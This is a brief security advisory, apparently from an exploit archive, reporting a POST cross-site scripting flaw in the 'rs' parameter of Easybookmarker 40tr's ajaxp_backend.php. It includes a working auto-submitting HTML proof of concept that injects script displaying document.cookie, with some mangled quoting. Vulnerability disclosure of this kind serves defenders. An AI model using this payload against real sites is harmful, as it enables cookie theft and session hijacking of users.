Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani

---

Script : Easybookmarker 40tr

Type : Xss Vulnerability

Method : POST

Alert : High

---

Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

My Offical Website : HTTP://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com

---

Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR

---

Script Download : http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip

---

Xss Vulnerability :

Variable : rs
Send Method : POST

Set rs variable with post method in ajaxp_backend.php : <script>alert('xss')</script> for test
vulnerability

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://example/zomplog/ajaxp_backend.php&quot;

method="POST" name="form">

<input type="hidden" name="rs" value="" <script>alert(document.cookie)</script>">

</form>
</body>
</html>

---

                    Tnx : God

                 HTTP://IRCRASH.COM

---